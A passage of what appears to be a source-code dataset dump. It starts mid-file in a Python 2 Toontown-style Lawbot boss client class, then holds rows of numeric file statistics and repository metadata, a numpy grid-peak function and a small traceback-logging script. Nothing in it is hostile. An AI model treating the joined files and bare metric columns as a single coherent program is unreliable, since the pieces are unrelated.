self.battleThreeMusicTime = self.battleThreeMusic.getTime() self.battleThreeMusic.stop() def enterReward(self): self.cleanupIntervals() self.clearChat() self.witnessToon.clearChat() self.stash() self.stopAnimate() self.controlToons() panelName = self.uniqueName('reward') self.rewardPanel = RewardPanel.RewardPanel(panelName) victory, camVictory, skipper = MovieToonVictory.doToonVictory(1, self.involvedToons, self.toonRewardIds, self.toonRewardDicts, self.deathList, self.rewardPanel, allowGroupShot=0, uberList=self.uberList, noSkip=True) ival = Sequence(Parallel(victory, camVictory), Func(self.__doneReward)) intervalName = 'RewardMovie' delayDeletes = [] for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: delayDeletes.append(DelayDelete.DelayDelete(toon, 'LawbotBoss.enterReward')) ival.delayDeletes = delayDeletes ival.start() self.storeInterval(ival, intervalName) base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def __doneReward(self): self.notify.debug('----- __doneReward') self.doneBarrier('Reward') self.toWalkMode() def exitReward(self): self.notify.debug('----- exitReward') intervalName = 'RewardMovie' self.clearInterval(intervalName) self.unstash() self.rewardPanel.destroy() del self.rewardPanel self.battleThreeMusicTime = 0 self.battleThreeMusic.stop() def enterEpilogue(self): self.cleanupIntervals() self.clearChat() self.witnessToon.clearChat() self.stash() self.stopAnimate() self.controlToons() self.__showWitnessToon() self.witnessToon.reparentTo(render) self.witnessToon.setPosHpr(*ToontownGlobals.LawbotBossWitnessEpiloguePosHpr) self.witnessToon.loop('Sit') self.__arrangeToonsAroundWitnessToon() camera.reparentTo(render) camera.setPos(self.witnessToon, -9, 12, 6) camera.lookAt(self.witnessToon, 0, 0, 3) intervalName = 'EpilogueMovie' seq = Sequence(self.makeEpilogueMovie(), name=intervalName) seq.start() self.storeInterval(seq, intervalName) self.accept('doneChatPage', self.__doneEpilogue) base.playMusic(self.epilogueMusic, looping=1, volume=0.9) def __doneEpilogue(self, elapsedTime = 0): self.notify.debug('----- __doneEpilogue') intervalName = 'EpilogueMovieToonAnim' self.clearInterval(intervalName) track = Parallel(Sequence(Wait(0.5), Func(self.localToonToSafeZone))) self.storeInterval(track, intervalName) track.start() def exitEpilogue(self): self.notify.debug('----- exitEpilogue') self.clearInterval('EpilogueMovieToonAnim') self.unstash() self.epilogueMusic.stop() def enterFrolic(self): self.notify.debug('----- enterFrolic') self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) DistributedBossCog.DistributedBossCog.enterFrolic(self) self.show() def doorACallback(self, isOpen): if self.insidesANodePath: if isOpen: self.insidesANodePath.unstash() else: self.insidesANodePath.stash() def doorBCallback(self, isOpen): if self.insidesBNodePath: if isOpen: self.insidesBNodePath.unstash() else: self.insidesBNodePath.stash() def __toonsToPromotionPosition(self, toonIds, battleNode): self.notify.debug('----- __toonsToPromotionPosition') points = BattleBase.BattleBase.toonPoints[len(toonIds) - 1] for i in xrange(len(toonIds)): toon = base.cr.doId2do.get(toonIds[i]) if toon: toon.reparentTo(render) pos, h = points[i] toon.setPosHpr(battleNode, pos[0], pos[1] + 10, pos[2], h, 0, 0) def __outOfPies(self): self.notify.debug('----- outOfPies') self.__showOnscreenMessage(TTLocalizer.LawbotBossNeedMoreEvidence) taskMgr.doMethodLater(20, self.__howToGetPies, self.uniqueName('PieAdvice')) def __howToGetPies(self, task): self.notify.debug('----- __howToGetPies') self.__showOnscreenMessage(TTLocalizer.LawbotBossHowToGetEvidence) def __howToThrowPies(self, task): self.notify.debug('----- __howToThrowPies') self.__showOnscreenMessage(TTLocalizer.LawbotBossHowToThrowPies) def __foundPieButton(self): self.everThrownPie = 1 self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) def __touchedWitnessStand(self, entry): self.sendUpdate('touchWitnessStand', []) self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) base.playSfx(self.piesRestockSfx) if not self.everThrownPie: taskMgr.doMethodLater(30, self.__howToThrowPies, self.uniqueName('PieAdvice')) def __pieSplat(self, toon, pieCode): if pieCode == ToontownGlobals.PieCodeBossInsides: if toon == localAvatar: self.d_hitBossInsides() self.flashRed() elif pieCode == ToontownGlobals.PieCodeBossCog: if toon == localAvatar: self.d_hitBoss(1) if self.dizzy: self.flashRed() self.doAnimate('hit', now=1) elif pieCode == ToontownGlobals.PieCodeDefensePan: self.flashRed() self.flashPanBlue() base.playSfx(self.evidenceHitSfx, node=self.defensePanNodePath, volume=0.25) if toon == localAvatar: self.d_hitBoss(self.panDamage) elif pieCode == ToontownGlobals.PieCodeProsecutionPan: self.flashGreen() if toon == localAvatar: pass elif pieCode == ToontownGlobals.PieCodeLawyer: pass def __localPieSplat(self, pieCode, entry): if pieCode == ToontownGlobals.PieCodeLawyer: self.__lawyerGotHit(entry) if pieCode != ToontownGlobals.PieCodeToon: return avatarDoId = entry.getIntoNodePath().getNetTag('avatarDoId') if avatarDoId == '': self.notify.warning('Toon %s has no avatarDoId tag.' % repr(entry.getIntoNodePath())) return doId = int(avatarDoId) if doId != localAvatar.doId: self.d_hitToon(doId) def __lawyerGotHit(self, entry): lawyerCol = entry.getIntoNodePath() names = lawyerCol.getName().split('-') lawyerDoId = int(names[1]) for lawyer in self.lawyers: if lawyerDoId == lawyer.doId: lawyer.sendUpdate('hitByToon', []) def __finalPieSplat(self, toon, pieCode): if pieCode != ToontownGlobals.PieCodeDefensePan: return self.sendUpdate('finalPieSplat', []) self.ignore('pieSplat') def cleanupAttacks(self): self.notify.debug('----- cleanupAttacks') self.__cleanupStrafe() def __cleanupStrafe(self): self.notify.debug('----- __cleanupStrage') if self.strafeInterval: self.strafeInterval.finish() self.strafeInterval = None return def __cleanupJuryBox(self): self.notify.debug('----- __cleanupJuryBox') if self.juryBoxIval: self.juryBoxIval.finish() self.juryBoxIval = None if self.juryBox: self.juryBox.removeNode() return def doStrafe(self, side, direction): gearRoot = self.rotateNode.attachNewNode('gearRoot') if side == 0: gearRoot.setPos(0, -7, 3) gearRoot.setHpr(180, 0, 0) door = self.doorA else: gearRoot.setPos(0, 7, 3) door = self.doorB gearRoot.setTag('attackCode', str(ToontownGlobals.BossCogStrafeAttack)) gearModel = self.getGearFrisbee() gearModel.setScale(0.1) t = self.getBossDamage() / 100.0 gearTrack = Parallel() numGears = int(4 + 6 * t + 0.5) time = 5.0 - 4.0 * t spread = 60 * math.pi / 180.0 if direction == 1: spread = -spread dist = 50 rate = time / numGears for i in xrange(numGears): node = gearRoot.attachNewNode(str(i)) node.hide() node.setPos(0, 0, 0) gear = gearModel.instanceTo(node) angle = (float(i) / (numGears - 1) - 0.5) * spread x = dist * math.sin(angle) y = dist * math.cos(angle) h = random.uniform(-720, 720) gearTrack.append(Sequence(Wait(i * rate), Func(node.show), Parallel(node.posInterval(1, Point3(x, y, 0), fluid=1), node.hprInterval(1, VBase3(h, 0, 0), fluid=1), Sequence(SoundInterval(self.strafeSfx[i], volume=0.2, node=self), duration=0)), Func(node.detachNode))) seq = Sequence(Func(door.request, 'open'), Wait(0.7), gearTrack, Func(door.request, 'close')) self.__cleanupStrafe() self.strafeInterval = seq seq.start() def replaceCollisionPolysWithPlanes(self, model): newCollisionNode = CollisionNode('collisions') newCollideMask = BitMask32(0) planes = [] collList = model.findAllMatches('**/+CollisionNode') if not collList: collList = [model] for cnp in collList: cn = cnp.node() if not isinstance(cn, CollisionNode): self.notify.warning('Not a collision node: %s' % repr(cnp)) break newCollideMask = newCollideMask | cn.getIntoCollideMask() for i in xrange(cn.getNumSolids()): solid = cn.getSolid(i) if isinstance(solid, CollisionPolygon): plane = Plane(solid.getPlane()) planes.append(plane) else: self.notify.warning('Unexpected collision solid: %s' % repr(solid)) newCollisionNode.addSolid(plane) newCollisionNode.setIntoCollideMask(newCollideMask) threshold = 0.1 planes.sort(lambda p1, p2: p1.compareTo(p2, threshold)) lastPlane = None for plane in planes: if lastPlane == None or plane.compareTo(lastPlane, threshold) != 0: cp = CollisionPlane(plane) newCollisionNode.addSolid(cp) lastPlane = plane return NodePath(newCollisionNode) def makeIntroductionMovie(self, delayDeletes): self.notify.debug('----- makeIntroductionMovie') for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: delayDeletes.append(DelayDelete.DelayDelete(toon, 'LawbotBoss.makeIntroductionMovie')) track = Parallel() bossAnimTrack = Sequence( ActorInterval(self, 'Ff_speech', startTime=2, duration=10, loop=1), ActorInterval(self, 'Ff_lookRt', duration=3), ActorInterval(self, 'Ff_lookRt', duration=3, startTime=3, endTime=0), ActorInterval(self, 'Ff_neutral', duration=2), ActorInterval(self, 'Ff_speech', duration=7, loop=1)) track.append(bossAnimTrack) attackToons = TTLocalizer.BossCogAttackToons dialogTrack = Track( (0, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro0, CFSpeech)), (5.6, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro1, CFSpeech)), (12, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro2, CFSpeech)), (18, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro3, CFSpeech)), (22, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro4, CFSpeech)), (24, Sequence( Func(self.clearChat), self.loseCogSuits(self.toonsA + self.toonsB, render, (-2.798, -70, 10, 180, 0, 0)))), (27, Sequence( self.toonNormalEyes(self.involvedToons), Func(self.loop, 'Ff_neutral'), Func(self.setChatAbsolute, attackToons, CFSpeech)))) track.append(dialogTrack) return Sequence( Func(self.stickToonsToFloor), track, Func(self.unstickToons), name=self.uniqueName('Introduction')) def walkToonsToBattlePosition(self, toonIds, battleNode): self.notify.debug('walkToonsToBattlePosition-----------------------------------------------') self.notify.debug('toonIds=%s battleNode=%s' % (toonIds, battleNode)) ival = Parallel() points = BattleBase.BattleBase.toonPoints[len(toonIds) - 1] self.notify.debug('walkToonsToBattlePosition: points = %s' % points[0][0]) for i in xrange(len(toonIds)): toon = base.cr.doId2do.get(toonIds[i]) if toon: pos, h = points[i] origPos = pos self.notify.debug('origPos = %s' % origPos) self.notify.debug('batlleNode.getTransform = %s render.getTransform=%s' % (battleNode.getTransform(), render.getTransform())) self.notify.debug('render.getScale()=%s battleNode.getScale()=%s' % (render.getScale(), battleNode.getScale())) myCurPos = self.getPos() self.notify.debug('myCurPos = %s' % self.getPos()) self.notify.debug('battleNode.parent() = %s' % battleNode.getParent()) self.notify.debug('battleNode.parent().getPos() = %s' % battleNode.getParent().getPos()) bnParent = battleNode.getParent() battleNode.wrtReparentTo(render) bnWorldPos = battleNode.getPos() battleNode.wrtReparentTo(bnParent) self.notify.debug('battle node world pos = %s' % bnWorldPos) pos = render.getRelativePoint(battleNode, pos) self.notify.debug('walktToonsToBattlePosition: render.getRelativePoint result = %s' % pos) self.notify.debug('walkToonsToBattlePosition: final pos = %s' % pos) ival.append(Sequence(Func(toon.setPlayRate, 0.8, 'walk'), Func(toon.loop, 'walk'), toon.posInterval(3, pos), Func(toon.setPlayRate, 1, 'walk'), Func(toon.loop, 'neutral'))) return ival def toonsToBattlePosition(self, toonIds, battleNode): self.notify.debug('DistrutedLawbotBoss.toonsToBattlePosition----------------------------------------') self.notify.debug('toonIds=%s battleNode=%s' % (toonIds, battleNode)) if len(toonIds) < 5: points = BattleBase.BattleBase.toonPoints[len(toonIds) - 1] else: points = list(BattleBase.BattleBase.toonPoints[3]) points.extend(BattleBase.BattleBase.toonPoints[len(toonIds) - 5]) self.notify.debug('toonsToBattlePosition: points = %s' % points[0][0]) for i in xrange(len(toonIds)): toon = base.cr.doId2do.get(toonIds[i]) if toon: toon.wrtReparentTo(render) pos, h = points[i] if i > 3: pos.setY(pos.getY() + 2.0) bnParent = battleNode.getParent() battleNode.wrtReparentTo(render) bnWorldPos = battleNode.getPos() battleNode.wrtReparentTo(bnParent) toon.setPosHpr(battleNode, pos[0], pos[1], pos[2], h, 0, 0) self.notify.debug('new toon pos %s ' % toon.getPos()) def touchedGavel(self, gavel, entry): self.notify.debug('touchedGavel') attackCodeStr = entry.getIntoNodePath().getNetTag('attackCode') if attackCodeStr == '': self.notify.warning('Node %s has no attackCode tag.' % repr(entry.getIntoNodePath())) return attackCode = int(attackCodeStr) into = entry.getIntoNodePath() self.zapLocalToon(attackCode, into) def touchedGavelHandle(self, gavel, entry): attackCodeStr = entry.getIntoNodePath().getNetTag('attackCode') if attackCodeStr == '': self.notify.warning('Node %s has no attackCode tag.' % repr(entry.getIntoNodePath())) return attackCode = int(attackCodeStr) into = entry.getIntoNodePath() self.zapLocalToon(attackCode, into) def createBlock(self, x1, y1, z1, x2, y2, z2, r = 1.0, g = 1.0, b = 1.0, a = 1.0): gFormat = GeomVertexFormat.getV3n3cpt2() myVertexData = GeomVertexData('holds my vertices', gFormat, Geom.UHDynamic) vertexWriter = GeomVertexWriter(myVertexData, 'vertex') normalWriter = GeomVertexWriter(myVertexData, 'normal') colorWriter = GeomVertexWriter(myVertexData, 'color') texWriter = GeomVertexWriter(myVertexData, 'texcoord') vertexWriter.addData3f(x1, y1, z1) vertexWriter.addData3f(x2, y1, z1) vertexWriter.addData3f(x1, y2, z1) vertexWriter.addData3f(x2, y2, z1) vertexWriter.addData3f(x1, y1, z2) vertexWriter.addData3f(x2, y1, z2) vertexWriter.addData3f(x1, y2, z2) vertexWriter.addData3f(x2, y2, z2) for index in xrange(8): normalWriter.addData3f(1.0, 1.0, 1.0) colorWriter.addData4f(r, g, b, a) texWriter.addData2f(1.0, 1.0) tris = GeomTriangles(Geom.UHDynamic) tris.addVertex(0) tris.addVertex(1) tris.addVertex(2) tris.closePrimitive() tris.addVertex(1) tris.addVertex(3) tris.addVertex(2) tris.closePrimitive() tris.addVertex(2) tris.addVertex(3) tris.addVertex(6) tris.closePrimitive() tris.addVertex(3) tris.addVertex(7) tris.addVertex(6) tris.closePrimitive() tris.addVertex(0) tris.addVertex(2) tris.addVertex(4) tris.closePrimitive() tris.addVertex(2) tris.addVertex(6) tris.addVertex(4) tris.closePrimitive() tris.addVertex(1) tris.addVertex(5) tris.addVertex(3) tris.closePrimitive() tris.addVertex(3) tris.addVertex(5) tris.addVertex(7) tris.closePrimitive() tris.addVertex(0) tris.addVertex(4) tris.addVertex(5) tris.closePrimitive() tris.addVertex(1) tris.addVertex(0) tris.addVertex(5) tris.closePrimitive() tris.addVertex(4) tris.addVertex(6) tris.addVertex(7) tris.closePrimitive() tris.addVertex(7) tris.addVertex(5) tris.addVertex(4) tris.closePrimitive() cubeGeom = Geom(myVertexData) cubeGeom.addPrimitive(tris) cubeGN = GeomNode('cube') cubeGN.addGeom(cubeGeom) return cubeGN def __enterDefenseCol(self, entry): self.notify.debug('__enterDefenseCol') def __enterProsecutionCol(self, entry): self.notify.debug('__enterProsecutionCol') def makeVictoryMovie(self): myFromPos = Point3(ToontownGlobals.LawbotBossBattleThreePosHpr[0], ToontownGlobals.LawbotBossBattleThreePosHpr[1], ToontownGlobals.LawbotBossBattleThreePosHpr[2]) myToPos = Point3(myFromPos[0], myFromPos[1] + 30, myFromPos[2]) rollThroughDoor = self.rollBossToPoint(fromPos=myFromPos, fromHpr=None, toPos=myToPos, toHpr=None, reverse=0) rollTrack = Sequence( Func(self.getGeomNode().setH, 180), rollThroughDoor[0], Func(self.getGeomNode().setH, 0)) rollTrackDuration = rollTrack.getDuration() self.notify.debug('rollTrackDuration = %f' % rollTrackDuration) doorStartPos = self.door3.getPos() doorEndPos = Point3(doorStartPos[0], doorStartPos[1], doorStartPos[2] + 25) bossTrack = Track( (0.5, Sequence( Func(self.clearChat), Func(camera.reparentTo, render), Func(camera.setPos, -3, 45, 25), Func(camera.setHpr, 0, 10, 0))), (1.0, Func(self.setChatAbsolute, TTLocalizer.LawbotBossDefenseWins1, CFSpeech)), (5.5, Func(self.setChatAbsolute, TTLocalizer.LawbotBossDefenseWins2, CFSpeech)), (9.5, Sequence(Func(camera.wrtReparentTo, render))), (9.6, Parallel( rollTrack, Func(self.setChatAbsolute, TTLocalizer.LawbotBossDefenseWins3, CFSpeech), self.door3.posInterval(2, doorEndPos, startPos=doorStartPos))), (13.1, Sequence(self.door3.posInterval(1, doorStartPos)))) retTrack = Parallel(bossTrack, ActorInterval(self, 'Ff_speech', loop=1)) return bossTrack def makeEpilogueMovie(self): epSpeech = TTLocalizer.WitnessToonCongratulations epSpeech = self.__talkAboutPromotion(epSpeech) bossTrack = Sequence(Func(self.witnessToon.animFSM.request, 'neutral'), Func(self.witnessToon.setLocalPageChat, epSpeech, 0)) return bossTrack def makeDefeatMovie(self): bossTrack = Track((0.0, Sequence(Func(self.clearChat), Func(self.reverseHead), ActorInterval(self, 'Ff_speech'))), (1.0, Func(self.setChatAbsolute, TTLocalizer.LawbotBossProsecutionWins, CFSpeech))) return bossTrack def __makeWitnessToon(self): dnaNetString = 't\x1b\x00\x01\x01\x00\x03\x00\x03\x01\x10\x13\x00\x13\x13' npc = Toon.Toon() npc.setDNAString(dnaNetString) npc.setName(TTLocalizer.WitnessToonName) npc.setPickable(0) npc.setPlayerType(NametagGroup.CCNonPlayer) npc.animFSM.request('Sit') self.witnessToon = npc self.witnessToon.setPosHpr(*ToontownGlobals.LawbotBossWitnessStandPosHpr) def __cleanupWitnessToon(self): self.__hideWitnessToon() if self.witnessToon: self.witnessToon.removeActive() self.witnessToon.delete() self.witnessToon = None return def __showWitnessToon(self): if not self.witnessToonOnstage: self.witnessToon.addActive() self.witnessToon.reparentTo(self.geom) seatCenter = self.realWitnessStand.find('**/witnessStandSeatEdge') center = seatCenter.getPos() self.notify.debug('center = %s' % center) self.witnessToon.setPos(center) self.witnessToon.setH(180) self.witnessToon.setZ(self.witnessToon.getZ() - 1.5) self.witnessToon.setY(self.witnessToon.getY() - 1.15) self.witnessToonOnstage = 1 def __hideWitnessToon(self): if self.witnessToonOnstage: self.witnessToon.removeActive() self.witnessToon.detachNode() self.witnessToonOnstage = 0 def __hideToons(self): for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.hide() def __showToons(self): for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.show() def __arrangeToonsAroundWitnessToon(self): radius = 7 numToons = len(self.involvedToons) center = (numToons - 1) / 2.0 for i in xrange(numToons): toon = self.cr.doId2do.get(self.involvedToons[i]) if toon: angle = 90 - 15 * (i - center) radians = angle * math.pi / 180.0 x = math.cos(radians) * radius y = math.sin(radians) * radius toon.setPos(self.witnessToon, x, y, 0) toon.headsUp(self.witnessToon) toon.loop('neutral') toon.show() def __talkAboutPromotion(self, speech): if self.prevCogSuitLevel < ToontownGlobals.MaxCogSuitLevel: newCogSuitLevel = localAvatar.getCogLevels()[CogDisguiseGlobals.dept2deptIndex(self.style.dept)] if newCogSuitLevel == ToontownGlobals.MaxCogSuitLevel: speech += TTLocalizer.WitnessToonLastPromotion % (ToontownGlobals.MaxCogSuitLevel + 1) if newCogSuitLevel in ToontownGlobals.CogSuitHPLevels: speech += TTLocalizer.WitnessToonHPBoost else: speech += TTLocalizer.WitnessToonMaxed % (ToontownGlobals.MaxCogSuitLevel + 1) return speech def __positionToonsInFrontOfCannons(self): self.notify.debug('__positionToonsInFrontOfCannons') index = 0 self.involvedToons.sort() for toonId in self.involvedToons: if index in self.cannons: cannon = self.cannons[index] toon = self.cr.doId2do.get(toonId) self.notify.debug('cannonId = %d' % cannon.doId) cannonPos = cannon.nodePath.getPos(render) self.notify.debug('cannonPos = %s' % cannonPos) if toon: self.notify.debug('toon = %s' % toon.getName()) toon.reparentTo(cannon.nodePath) toon.setPos(0, 8, 0) toon.setH(180) renderPos = toon.getPos(render) self.notify.debug('renderPos =%s' % renderPos) index += 1 self.notify.debug('done with positionToons') def __makePrepareBattleTwoMovie(self): chatString = TTLocalizer.WitnessToonPrepareBattleTwo % ToontownGlobals.LawbotBossJurorsForBalancedScale movie = Sequence(Func(camera.reparentTo, self.witnessToon), Func(camera.setPos, 0, 8, 2), Func(camera.setHpr, 180, 10, 0), Func(self.witnessToon.setLocalPageChat, chatString, 0)) return movie def __doWitnessPrepareBattleThreeChat(self): self.notify.debug('__doWitnessPrepareBattleThreeChat: original self.numToonJurorsSeated = %d' % self.numToonJurorsSeated) self.countToonJurors() self.notify.debug('after calling self.countToonJurors, numToonJurorsSeated=%d' % self.numToonJurorsSeated) if self.numToonJurorsSeated == 0: juryResult = TTLocalizer.WitnessToonNoJuror elif self.numToonJurorsSeated == 1: juryResult = TTLocalizer.WitnessToonOneJuror elif self.numToonJurorsSeated == 12: juryResult = TTLocalizer.WitnessToonAllJurors else: juryResult = TTLocalizer.WitnessToonSomeJurors % self.numToonJurorsSeated juryResult += '\x07' trialSpeech = juryResult trialSpeech += TTLocalizer.WitnessToonPrepareBattleThree diffSettings = ToontownGlobals.LawbotBossDifficultySettings[self.battleDifficulty] if diffSettings[4]: newWeight, self.bonusWeight, self.numJurorsLocalToonSeated = self.calculateWeightOfToon(base.localAvatar.doId) if self.bonusWeight > 0: if self.bonusWeight == 1: juryWeightBonus = TTLocalizer.WitnessToonJuryWeightBonusSingular.get(self.battleDifficulty) else: juryWeightBonus = TTLocalizer.WitnessToonJuryWeightBonusPlural.get(self.battleDifficulty) if juryWeightBonus: weightBonusText = juryWeightBonus % (self.numJurorsLocalToonSeated, self.bonusWeight) trialSpeech += '\x07' trialSpeech += weightBonusText self.witnessToon.setLocalPageChat(trialSpeech, 0) def __makePrepareBattleThreeMovie(self): movie = Sequence(Func(camera.reparentTo, render), Func(camera.setPos, -15, 15, 20), Func(camera.setHpr, -90, 0, 0), Wait(3), Func(camera.reparentTo, self.witnessToon), Func(camera.setPos, 0, 8, 2), Func(camera.setHpr, 180, 10, 0), Func(self.__doWitnessPrepareBattleThreeChat)) return movie def countToonJurors(self): self.numToonJurorsSeated = 0 for key in self.chairs.keys(): chair = self.chairs[key] if chair.state == 'ToonJuror' or chair.state == None and chair.newState == 'ToonJuror': self.numToonJurorsSeated += 1 self.notify.debug('self.numToonJurorsSeated = %d' % self.numToonJurorsSeated) return def cleanupPanFlash(self): if self.panFlashInterval: self.panFlashInterval.finish() self.panFlashInterval = None return def flashPanBlue(self): self.cleanupPanFlash() intervalName = 'FlashPanBlue' self.defensePanNodePath.setColorScale(1, 1, 1, 1) seq = Sequence(self.defensePanNodePath.colorScaleInterval(0.1, colorScale=VBase4(0, 0, 1, 1)), self.defensePanNodePath.colorScaleInterval(0.3, colorScale=VBase4(1, 1, 1, 1)), name=intervalName) self.panFlashInterval = seq seq.start() self.storeInterval(seq, intervalName) def saySomething(self, chatString): intervalName = 'ChiefJusticeTaunt' seq = Sequence(name=intervalName) seq.append(Func(self.setChatAbsolute, chatString, CFSpeech)) seq.append(Wait(4.0)) seq.append(Func(self.clearChat)) oldSeq = self.activeIntervals.get(intervalName) if oldSeq: oldSeq.finish() seq.start() self.storeInterval(seq, intervalName) def setTaunt(self, tauntIndex, extraInfo): gotError = False if not hasattr(self, 'state'): self.notify.warning('returning from setTaunt, no attr state') gotError = True elif not self.state == 'BattleThree': self.notify.warning('returning from setTaunt, not in battle three state, state=%s', self.state) gotError = True if not hasattr(self, 'nametag'): self.notify.warning('returning from setTaunt, no attr nametag') gotError = True if gotError: st = StackTrace() print st return chatString = TTLocalizer.LawbotBossTaunts[1] if tauntIndex == 0: if extraInfo < len(self.involvedToons): toonId = self.involvedToons[extraInfo] toon = base.cr.doId2do.get(toonId) if toon: chatString = TTLocalizer.LawbotBossTaunts[tauntIndex] % toon.getName() else: chatString = TTLocalizer.LawbotBossTaunts[tauntIndex] self.saySomething(chatString) def toonGotHealed(self, toonId): toon = base.cr.doId2do.get(toonId) if toon: base.playSfx(self.toonUpSfx, node=toon) def hideBonusTimer(self): if self.bonusTimer: self.bonusTimer.hide() def enteredBonusState(self): self.witnessToon.clearChat() text = TTLocalizer.WitnessToonBonus % (ToontownGlobals.LawbotBossBonusWeightMultiplier, ToontownGlobals.LawbotBossBonusDuration) self.witnessToon.setChatAbsolute(text, CFSpeech | CFTimeout) base.playSfx(self.toonUpSfx) if not self.bonusTimer: self.bonusTimer = ToontownTimer.ToontownTimer() self.bonusTimer.posInTopRightCorner() self.bonusTimer.show() self.bonusTimer.countdown(ToontownGlobals.LawbotBossBonusDuration, self.hideBonusTimer) def setAttackCode(self, attackCode, avId = 0): DistributedBossCog.DistributedBossCog.setAttackCode(self, attackCode, avId) if attackCode == ToontownGlobals.BossCogAreaAttack: self.saySomething(TTLocalizer.LawbotBossAreaAttackTaunt) base.playSfx(self.warningSfx) def setBattleDifficulty(self, diff): self.notify.debug('battleDifficulty = %d' % diff) self.battleDifficulty = diff def toonEnteredCannon(self, toonId, cannonIndex): if base.localAvatar.doId == toonId: self.cannonIndex = cannonIndex def numJurorsSeatedByCannon(self, cannonIndex): retVal = 0 for chair in self.chairs.values(): if chair.state == 'ToonJuror': if chair.toonJurorIndex == cannonIndex: retVal += 1 return retVal def calculateWeightOfToon(self, toonId): defaultWeight = 1 bonusWeight = 0 newWeight = 1 cannonIndex = self.cannonIndex numJurors = 0 if not cannonIndex == None and cannonIndex >= 0: diffSettings = ToontownGlobals.LawbotBossDifficultySettings[self.battleDifficulty] if diffSettings[4]: numJurors = self.numJurorsSeatedByCannon(cannonIndex) bonusWeight = numJurors - diffSettings[5] if bonusWeight < 0: bonusWeight = 0 newWeight = defaultWeight + bonusWeight self.notify.debug('toon %d has weight of %d' % (toonId, newWeight)) return (newWeight, bonusWeight, numJurors)
45.157866
363
0.655889
7,598
83,813
7.184522
0.143064
0.024548
0.034073
0.017751
0.296237
0.240822
0.203488
0.162069
0.141075
0.114274
0
0.016161
0.235143
83,813
1,855
364
45.18221
0.835379
0
0
0.338452
0
0.000591
0.076122
0.024352
0
0
0
0
0
0
null
null
0.005316
0.019492
null
null
0.000591
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5ddabeb7b320c12ce5eecb63db650328a9b8e392
903
py
Python
utils/gridpeak.py
siwill22/magSA
9f3a12e6ed971d67444804cad57734dc0b4772ff
[ "MIT" ]
null
null
null
utils/gridpeak.py
siwill22/magSA
9f3a12e6ed971d67444804cad57734dc0b4772ff
[ "MIT" ]
null
null
null
utils/gridpeak.py
siwill22/magSA
9f3a12e6ed971d67444804cad57734dc0b4772ff
[ "MIT" ]
null
null
null
import numpy def gridpeak(t, X=None): # GP = GRIDPEAK(...) # gp = gridpeak(t) return gridpeaks based on Blakely # and Simpson method # gp = gridpeak(t,X) optionally remove peak values scoring less than X, # where X can be between 1 and 4. print 'shape ', t.shape m, n = t.shape p = 1 gp = numpy.zeros((m, n)) for i in numpy.arange(p, m - p): for j in numpy.arange(p, n - p): data = numpy.zeros(4) data[0] = t[i - p, j] < t[i, j] and t[i, j] > t[i + p, j] data[1] = t[i, j - p] < t[i, j] and t[i, j] > t[i, j + p] data[2] = t[i + p, j - p] < t[i, j] and t[i, j] > t[i - p, j + p] data[3] = t[i - p, j - p] < t[i, j] and t[i, j] > t[i + p, j + p] gp[i, j] = numpy.sum(data) if X: gp[gp < X] = numpy.nan gp = gp / gp return gp
29.129032
78
0.447398
165
903
2.448485
0.284848
0.079208
0.074257
0.059406
0.158416
0.158416
0.158416
0.158416
0.158416
0.158416
0
0.014414
0.385382
903
30
79
30.1
0.713514
0.245847
0
0
0
0
0.008889
0
0
0
0
0
0
0
null
null
0
0.055556
null
null
0.055556
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5ddc336e8c10627292e9d9762e105aa2a19572a4
262
py
Python
Chapter 10/trackbackLog.py
Miillky/automate_the_boring_stuff_with_python
284b074b0738c66f38b54fe0fc5f69b3446e7e43
[ "MIT" ]
null
null
null
Chapter 10/trackbackLog.py
Miillky/automate_the_boring_stuff_with_python
284b074b0738c66f38b54fe0fc5f69b3446e7e43
[ "MIT" ]
null
null
null
Chapter 10/trackbackLog.py
Miillky/automate_the_boring_stuff_with_python
284b074b0738c66f38b54fe0fc5f69b3446e7e43
[ "MIT" ]
null
null
null
import traceback try: raise Exception('This is the error message.') except: errorFile = open('./Chapter 10/errorInfo.txt', 'w') errorFile.write(traceback.format_exc()) errorFile.close() print('The traceback info was written to errorInfo.txt')
32.75
60
0.709924
34
262
5.441176
0.794118
0.12973
0
0
0
0
0
0
0
0
0
0.009132
0.164122
262
8
60
32.75
0.835616
0
0
0
0
0
0.380228
0
0
0
0
0
0
1
0
false
0
0.125
0
0.125
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5ddf93a5acfa110cbd927feae9cad660c39b795d
926
py
Python
lesson10019_projects/pen/data/transition.py
muzudho/py-state-machine-practice
e31c066f4cf142b6b6c5ff273b56a0f89428c59e
[ "MIT" ]
null
null
null
lesson10019_projects/pen/data/transition.py
muzudho/py-state-machine-practice
e31c066f4cf142b6b6c5ff273b56a0f89428c59e
[ "MIT" ]
null
null
null
lesson10019_projects/pen/data/transition.py
muzudho/py-state-machine-practice
e31c066f4cf142b6b6c5ff273b56a0f89428c59e
[ "MIT" ]
null
null
null
